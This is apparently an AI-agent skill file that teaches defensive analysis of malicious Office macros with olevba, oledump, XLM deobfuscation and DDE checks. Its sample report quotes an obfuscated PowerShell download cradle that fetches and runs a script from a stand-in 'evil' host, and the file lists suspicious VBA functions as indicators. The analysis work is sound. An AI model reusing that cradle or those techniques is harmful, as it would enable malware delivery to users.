--- name: analyzing-macro-malware-in-office-documents description: 'Analyzes malicious VBA macros embedded in Microsoft Office documents (Word, Excel, PowerPoint) to identify download cradles, payload execution, persistence mechanisms, and anti-analysis techniques. Uses olevba, oledump, and VBA deobfuscation to extract the attack chain. Activates for requests involving Office macro analysis, VBA malware investigation, maldoc analysis, or document-based threat examination. ' domain: cybersecurity subdomain: malware-analysis tags: - malware - macro - Office - VBA - document-malware version: 1.0.0 author: mahipal license: Apache-2.0 atlas_techniques: - AML.T0068 - AML.T0067 d3fend_techniques: - File Metadata Consistency Validation - Application Protocol Command Analysis - Identifier Analysis - Content Format Conversion - Message Analysis nist_csf: - DE.AE-02 - RS.AN-03 - ID.RA-01 - DE.CM-01 --- # Analyzing Macro Malware in Office Documents ## When to Use - A suspicious Office document (.doc, .docm, .xls, .xlsm, .ppt) has been flagged by email security - Investigating phishing campaigns that deliver weaponized Office documents - Extracting VBA macro code to identify the payload download URL and execution method - Analyzing obfuscated VBA code to understand the full attack chain - Determining if a document uses DDE, ActiveX, or remote template injection instead of macros **Do not use** for analyzing non-macro Office threats (DDE, remote template injection); while this skill covers detection of these, specialized analysis may be needed. ## Prerequisites - Python 3.8+ with oletools installed (`pip install oletools`) - oledump.py from Didier Stevens (https://blog.didierstevens.com/programs/oledump-py/) - Isolated analysis VM without Microsoft Office installed (prevents accidental execution) - XLMDeobfuscator for Excel 4.0 macro analysis (pip install xlmdeobfuscator) - LibreOffice for safe document rendering (does not execute VBA macros by default) ## Workflow ### Step 1: Initial Document Triage Determine if the document contains macros or other active content: ```bash # Quick triage with olevba olevba suspect.docm # Check for OLE streams and macros oleid suspect.docm # Output indicators: # VBA Macros: True/False # XLM Macros: True/False # External Relationships: True/False (remote template) # ObjectPool: True/False (embedded objects) # Flash: True/False (SWF objects) # Comprehensive OLE analysis oledump.py suspect.docm # List all OLE streams with macro indicators # Streams marked with 'M' contain VBA macros # Streams marked with 'm' contain macro attributes ``` ### Step 2: Extract and Analyze VBA Code Pull out the complete VBA macro source: ```bash # Extract VBA with full deobfuscation olevba --decode --deobf suspect.docm # Extract just the VBA source code olevba --code suspect.docm > extracted_vba.txt # Detailed extraction with oledump oledump.py -s 8 -v suspect.docm # Stream 8 (adjust based on stream listing) # Extract all macro streams oledump.py -p plugin_vba_dco suspect.docm ``` ``` Key VBA Elements to Identify: ━━━━━━━━━━━━━━━━━━━━━━━━━━━ Auto-Execution Triggers: - Auto_Open / AutoOpen (Word) - Auto_Close / AutoClose - Document_Open / Document_Close - Workbook_Open (Excel) - AutoExec Suspicious Functions: - Shell() / Shell.Application - WScript.Shell.Run / Exec - CreateObject("WScript.Shell") - PowerShell execution - URLDownloadToFile - MSXML2.XMLHTTP (HTTP requests) - ADODB.Stream (file writing) - Environ() (environment variables) - CallByName (indirect method calls) ``` ### Step 3: Deobfuscate VBA Code Remove obfuscation layers to reveal the payload: ```python # VBA deobfuscation techniques import re def deobfuscate_vba(code): # 1. Resolve Chr() calls: Chr(104) & Chr(116) -> "ht" def resolve_chr(match): try: return chr(int(match.group(1))) except: return match.group(0) code = re.sub(r'Chr\$?\((\d+)\)', resolve_chr, code) # 2. Remove string concatenation: "htt" & "p://" -> "http://" code = re.sub(r'"\s*&\s*"', '', code) # 3. Resolve ChrW calls: ChrW(104) code = re.sub(r'ChrW\$?\((\d+)\)', resolve_chr, code) # 4. Resolve StrReverse: StrReverse("exe.daolnwod") -> "download.exe" def resolve_reverse(match): return '"' + match.group(1)[::-1] + '"' code = re.sub(r'StrReverse\("([^"]+)"\)', resolve_reverse, code) # 5. Remove Mid$/Left$/Right$ obfuscation (complex, mark for manual review) # 6. Resolve Replace(): Replace("Powxershxell", "x", "") def resolve_replace(match): original = match.group(1) find = match.group(2) replace_with = match.group(3) return '"' + original.replace(find, replace_with) + '"' code = re.sub(r'Replace\("([^"]+)",\s*"([^"]+)",\s*"([^"]*)"\)', resolve_replace, code) return code with open("extracted_vba.txt") as f: vba_code = f.read() deobfuscated = deobfuscate_vba(vba_code) print(deobfuscated) ``` ### Step 4: Analyze Excel 4.0 (XLM) Macros Handle legacy Excel macros that bypass VBA detection: ```bash # Detect XLM macros olevba --xlm suspect.xlsm # Deobfuscate XLM macros xlmdeobfuscator -f suspect.xlsm # Manual XLM analysis with oledump oledump.py suspect.xlsm -p plugin_biff.py # XLM (Excel 4.0) macro functions to watch for: # EXEC() - Execute shell command # CALL() - Call DLL function # REGISTER() - Register DLL function # URLDownloadToFileA - Download file # ALERT() - Display message (social engineering) # HALT() - Stop execution # GOTO() - Control flow # IF() - Conditional execution ``` ### Step 5: Check for Non-Macro Attack Vectors Examine the document for DDE, remote templates, and embedded objects: ```bash # Check for DDE (Dynamic Data Exchange) python3 -c " import zipfile import xml.etree.ElementTree as ET import re z = zipfile.ZipFile('suspect.docx') for name in z.namelist(): if name.endswith('.xml') or name.endswith('.rels'): content = z.read(name).decode('utf-8', errors='ignore') # DDE field codes if 'DDEAUTO' in content or 'DDE ' in content: print(f'[!] DDE found in {name}') dde_match = re.findall(r'DDEAUTO[^\"]*\"([^\"]+)\"', content) for m in dde_match: print(f' Command: {m}') # Remote template if 'attachedTemplate' in content or 'Target=' in content: urls = re.findall(r'Target=\"(https?://[^\"]+)\"', content) for url in urls: print(f'[!] Remote template URL: {url}') " # Check for embedded OLE objects oledump.py -p plugin_msg.py suspect.docm # Check relationships for external references python3 -c " import zipfile z = zipfile.ZipFile('suspect.docx') for name in z.namelist(): if '.rels' in name: content = z.read(name).decode('utf-8', errors='ignore') if 'http' in content.lower() or 'ftp' in content.lower(): print(f'External reference in {name}:') import re urls = re.findall(r'Target=\"([^\"]+)\"', content) for url in urls: print(f' {url}') " ``` ### Step 6: Generate Analysis Report Document the complete macro malware analysis: ``` Report should include: - Document metadata (author, creation date, modification date) - Macro presence and type (VBA, XLM, DDE, remote template) - Auto-execution trigger identified - Deobfuscated VBA source code (key functions) - Download URL(s) for second-stage payloads - Execution method (Shell, WScript, PowerShell, COM object) - Social engineering lure description - Extracted IOCs (URLs, domains, IPs, file hashes) - YARA rule for the specific document pattern ``` ## Key Concepts | Term | Definition | |------|------------| | **VBA Macro** | Visual Basic for Applications code embedded in Office documents that can interact with the OS, download files, and execute commands | | **Auto_Open** | VBA event procedure that executes automatically when a Word document is opened, the primary trigger for macro malware | | **OLE (Object Linking and Embedding)** | Microsoft compound document format; Office documents are OLE containers with streams that can contain macros and objects | | **DDE (Dynamic Data Exchange)** | Legacy Windows IPC mechanism abused in documents to execute commands without macros; triggered by field code updates | | **Remote Template Injection** | Attack loading a macro-enabled template from a remote URL when the document opens, bypassing initial macro detection | | **XLM Macros (Excel 4.0)** | Legacy Excel macro language predating VBA; stored in hidden sheets and often missed by traditional VBA analysis tools | | **Protected View** | Office sandbox that prevents macro execution until the user clicks "Enable Content"; social engineering targets this barrier | ## Tools & Systems - **oletools (olevba)**: Python toolkit for analyzing OLE files, extracting VBA macros, and detecting suspicious keywords and IOCs - **oledump.py**: Didier Stevens' tool for analyzing OLE streams with plugin support for VBA decompression and extraction - **XLMDeobfuscator**: Tool specifically designed for deobfuscating Excel 4.0 (XLM) macro formulas - **ViperMonkey**: VBA emulation engine that executes VBA macros in a sandboxed environment to observe behavior - **YARA**: Pattern matching for document-based malware detection using VBA string patterns and OLE structure indicators ## Common Scenarios ### Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros **Context**: Multiple employees received an email with an attached .docm file claiming to be an invoice. The document prompts users to "Enable Content" to view the full document. **Approach**: 1. Run oleid to confirm VBA macros are present and identify auto-execution triggers 2. Extract VBA code with olevba --decode --deobf for initial deobfuscation 3. Identify the auto-execution entry point (Auto_Open or Document_Open) 4. Trace the execution flow from the entry point through helper functions 5. Deobfuscate string concatenation and Chr() encoding to reveal the download URL 6. Identify the download method (WScript.Shell, MSXML2.XMLHTTP, PowerShell) 7. Extract all IOCs and create YARA rules for the specific obfuscation pattern **Pitfalls**: - Opening the document in Microsoft Office for "quick analysis" instead of using command-line tools - Missing VBA code stored in UserForms (GUI elements can contain code in their event handlers) - Ignoring document metadata that may contain attacker fingerprints (author name, template name) - Not checking for both VBA and XLM macros in the same document (some malware uses both) ## Output Format ``` OFFICE MACRO MALWARE ANALYSIS ================================ Document: invoice_q3_2025.docm SHA-256: e3b0c44298fc1c149afbf4c8996fb924... File Type: Microsoft Word Document (OOXML with macros) Author: Administrator Creation Date: 2025-09-10 14:23:00 MACRO ANALYSIS Type: VBA Macro Trigger: AutoOpen() Streams: 3 VBA streams (ThisDocument, Module1, Module2) DEOBFUSCATED EXECUTION CHAIN 1. AutoOpen() -> Calls Module1.RunPayload() 2. RunPayload() builds command string via Chr() concatenation 3. Command: powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAA... 4. Decoded: IEX (New-Object Net.WebClient).DownloadString('hxxp://evil[.]com/payload.ps1') SOCIAL ENGINEERING LURE - Document displays fake "Protected Document" image - Instructs user to "Enable Content" to view the document - Content is blurred/hidden until macros execute EXTRACTED IOCs Download URL: hxxp://evil[.]com/payload.ps1 C2 Domain: evil[.]com IP Address: 185.220.101[.]42 User-Agent: PowerShell (default WebClient) MITRE ATT&CK T1566.001 Phishing: Spearphishing Attachment T1204.002 User Execution: Malicious File T1059.001 Command and Scripting Interpreter: PowerShell T1059.005 Command and Scripting Interpreter: Visual Basic ```